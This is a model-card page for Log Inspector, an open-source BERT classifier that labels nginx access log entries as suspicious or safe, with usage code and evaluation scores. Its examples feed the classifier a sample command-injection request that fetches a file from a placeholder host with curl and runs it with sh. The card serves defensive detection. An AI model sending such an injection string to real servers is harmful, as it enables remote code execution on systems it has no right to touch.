Log-inspector Open-source Log Detection Model - Free Deployment for Accurate Identification of Suspicious and Security Logs

Home

Log Inspector

Developed by u-haru

A pre-trained model based on nginx access logs for detecting suspicious and security logs.

Text Classification

Transformers

EnglishOpen Source License:Apache-2.0 #Nginx log analysis #Malicious request detection #BERT pre-training

Downloads 138

Release Time : 12/23/2022

Model Overview

This model is based on the bert-base-cased architecture, specifically designed for analyzing nginx access logs and identifying suspicious log entries.

Model Features

High accuracy

Demonstrates high accuracy on evaluation datasets, effectively distinguishing between suspicious and secure logs.

Pre-trained model

Based on the bert-base-cased pre-trained model, it possesses strong text comprehension capabilities.

Easy to use

Provides two usage methods: transformers and simpletransformers, facilitating quick integration.

Model Capabilities

Log classification

Suspicious log detection

Security log identification

Use Cases

Cybersecurity

Suspicious log detection

Detects suspicious entries in nginx access logs, such as potential attack attempts.

Evaluation results on 10,000 logs show that the model accurately identified 9,964 suspicious logs.

🚀 Log Inspector

A pre - trained model for inspecting nginx access logs, based on [bert - base - cased](https://huggingface.co/bert - base - cased).

🚀 Quick Start

This model is designed to inspect nginx access logs. It can classify logs into suspicious and safe categories.

💻 Usage Examples

Basic Usage

The given text must be parsed in the following format:
"path: <path>; ref:<referrer>; ua:<user agent>;"

>>> from transformers import pipeline
>>> inspector = pipeline('text - classification', model="u - haru/log - inspector")
>>> inspector('path: /cgi - bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*";cd /tmp;curl -O http://O.O.O.O/zero;sh zero;"; ref:-; ua:-;')
[{'label': 'LABEL_0', 'score': 0.9999788999557495}]

Here, class 0 represents a suspicious log, and class 1 represents a safe log.

Advanced Usage

Using simpletransformer

>>> from simpletransformers.classification import ClassificationModel
>>> model = ClassificationModel('bert', "u - haru/log - inspector", num_labels=2, use_cuda=(use_cuda and torch.cuda.is_available()), args=param)
>>> predictions, raw_outputs = model.predict(['path: /cgi - bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*";cd /tmp;curl -O http://O.O.O.O/zero;sh zero;"; ref:-; ua:-;'])
>>> print(predictions)
[0]

Evaluation and Training

>>> from simpletransformers.classification import ClassificationModel
>>> model = ClassificationModel('bert', "u - haru/log - inspector", num_labels=2, use_cuda=(use_cuda and torch.cuda.is_available()), args=param)
>>> data = [["Suspicious log",0],["Safe log",1]]
>>> df = pd.DataFrame(data)

>>> model.train_model(df)
>>> result, model_outputs, wrong_predictions = model.eval_model(df)
>>> print(result)
{'mcc': 1.0, 'tp': 1, 'tn': 1, 'fp': 0, 'fn': 0, 'auroc': 1.0, 'auprc': 1.0, 'eval_loss': 1.8238850316265598e - 05}

The model was trained with 9500 access logs. Here is the evaluation score:

{'mcc': 0.993114718313972, 'tp': 1639, 'tn': 729, 'fp': 0, 'fn': 7, 'auroc': 0.9994166345815686, 'auprc': 0.9997937194890235, 'eval_loss': 0.020282083051662583}

And the evaluation with 10000 logs:

{'mcc': 0.8494104528008076, 'tp': 9964, 'tn': 26, 'fp': 0, 'fn': 10, 'auroc': 0.9999845752803442, 'auprc': 0.9999999597891697, 'eval_loss': 0.0058870489358901976}

📚 Documentation

The source codes for training are available here: [github.com/u - haru/log - inspector](https://github.com/u - haru/log - inspector)

📄 License

This project is licensed under the Apache 2.0 license.

Featured Recommended AI Models

Empowering the Future, Your AI Solution Knowledge Base

English 简体中文繁體中文にほんご